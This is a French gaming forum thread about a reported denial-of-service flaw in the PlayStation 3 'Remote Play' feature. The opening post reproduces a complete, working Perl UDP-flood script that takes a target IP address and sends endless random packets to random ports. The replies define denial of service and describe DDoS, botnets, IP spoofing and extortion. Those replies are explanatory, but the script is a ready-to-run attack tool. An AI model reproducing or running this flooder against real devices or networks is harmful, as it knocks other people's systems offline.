Playstation 3 'Remote Play' Remote DoS Exploit


Newserator
 Share

Messages recommandés

Le site Securityfocus.com, aurait trouvé une faille qui serait exploitable via votre PSP. Elle serait exploitable sur tous les firmwares PS3 incluant le 1.60 et le Firmware 3.10OE-A pour la PSP. Basée sur du code POC et utilisant Odix Perl Udp Flooder, la faille vous permettrait de faire un Denial On service sur votre PS3.

#!/usr/bin/perl####.:Playstation 3 "Remote Play" Remote DoS Exploit:.###### A UDP flood while the "remote play" feature is active# will result in a denial of service condition.## Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A## -Dark_K## POC code is based on odix's perl udp flooder##########################################################use Socket;$ARGC=@ARGV;if ($ARGC !=1) {printf "usage: ./ps3rpdos.pl n";exit(1);}socket(crazy, PF_INET, SOCK_DGRAM, 17);$iaddr = inet_aton("$ARGV[0]");printf "Sending...n";for (;;) {$size=$rand x $rand x $rand;$port=int(rand 65000) +1;send(crazy, 0, $size, sockaddr_in($port, $iaddr));}
Lien vers article original : http://ps3.gx-mod.com/modules/news/article.php?storyid=644
Lien vers le commentaire
Partager sur d'autres sites

Basée sur du code POC et utilisant Odix Perl Udp Flooder, la faille vous permettrait de faire un Denial On service sur votre PS3.

Hello

Je me demandes ce que c est un denial on service?

C pas tres compréhensible tout sa.

Lien vers le commentaire
Partager sur d'autres sites

Basée sur du code POC et utilisant Odix Perl Udp Flooder, la faille vous permettrait de faire un Denial On service sur votre PS3.

Hello

Je me demandes ce que c est un denial on service?

C pas tres compréhensible tout sa.

un dos permet de neutraliser un machine (généralement sur le reseau...) afin, par exemple, usurper sont identité ( adresse IP) pour recolter des info confidentielles (l'homme du milieu...)

c'est une technique de base des pirates, donc, ca peut etre une faille de sécurité grave. Ce bug sera surement rapidement colmaté

Lien vers le commentaire
Partager sur d'autres sites

Voila la définition exacte:

Effets

D'une manière générale, l'attaque par déni de service ou Denial of Service (DoS) vise à rendre une application informatique incapable de répondre aux requêtes de ses utilisateurs.

Une machine serveur offrant des services à ses clients (par exemple un serveur web) doit traiter des requêtes provenant de plusieurs clients. Lorsque ces derniers ne peuvent en bénéficier pour des raisons délibérément provoquées par un tiers il y a déni de service.

Types d'attaques

De nombreux types d'attaques par déni de service existent (le simple fait de débrancher la prise d'un serveur peut être qualifiée d'attaque par déni de service) mais l'attaquant procède souvent par saturation d'au moins un des éléments chargés d'animer l'application.

Déni par saturation

(Dos Denial of Saturation) La puissance de traitement des équipements (ordinateurs, équipements réseaux…) mobilisés est d'ordinaire définie afin qu'un nombre donné de requêtes soient simultanément honorées. Lorsque ce nombre augmente trop et de façon prolongée l'un des équipements sature et donc n'accepte plus toutes les nouvelles requêtes. Cela constitue un déni de service puisque certains utilisateurs ne pourront dès lors plus employer l'ensemble.

DDoS

L'approche appelée Distributed Denial of Service (DDoS) repose sur une parallèlisation d'attaques DoS, simultanément menées par plusieurs systèmes contre un seul. Cela réduit le temps nécessaire à l'attaque et amplifie ses effets. Dans ce type d'attaque les pirates se dissimulent parfois grâce à des machine-rebonds, utilisées à l'insu de leurs propriétaires. Un ensemble de machine-rebonds, également appelé botnet, est contrôlable par un pirate après infection de chacune d'elles par un programme de type porte dérobée.

Responsables de ces attaques

Ces attaques sont souvent utilisées par les lamers, les script kiddies ou les concepteurs de virus. Ils peuvent transiter par des botnets.

Ce genre d'attaque est également très utile à un pirate qui ne réussit pas à prendre le contrôle d'une machine en tentant de se faire passer pour une machine de confiance grâce à l'IP spoofing. En effet en cas de demande de session (TCP SYN) avec une adresse IP « spoofée » qui serait celle de la machine de confiance c'est bien cette dernière qui recevrait le paquet TCP SYN/ACK émis par la cible, donc elle réinitialiserait automatiquement la tentative de connexion avec un paquet RST (puisqu'elle n'est pas à l'origine de la demande d'établissement de session), interdisant au pirate d'établir une session.

Depuis quelques années l'attaque par déni de service distribué est utilisée à des fins de chantage et tentative d'extorsion auprès des entreprises dont l'activité commerciale repose sur la disponibilité de leur site Web. Ces rackets sont davantage le fait d'organisations criminelles (mafieuses) que de pirates isolés.

Modifié par babeule
Lien vers le commentaire
Partager sur d'autres sites

Les failles vont commencé a pleuvoir ;) déjà la deuxième , surtout une de ce type sa doit les faire flippé chez sony . Tout ce qui est fait par l'homme peut être contourné par l'homme, en gros c'est la course : correction des failles -->> hack -->>.......

Lien vers le commentaire
Partager sur d'autres sites

Créer un compte ou se connecter pour commenter

Vous devez être membre afin de pouvoir déposer un commentaire

Créer un compte

Créez un compte sur notre communauté. C’est facile !

Créer un nouveau compte

Se connecter

Vous avez déjà un compte ? Connectez-vous ici.

Connectez-vous maintenant
 Share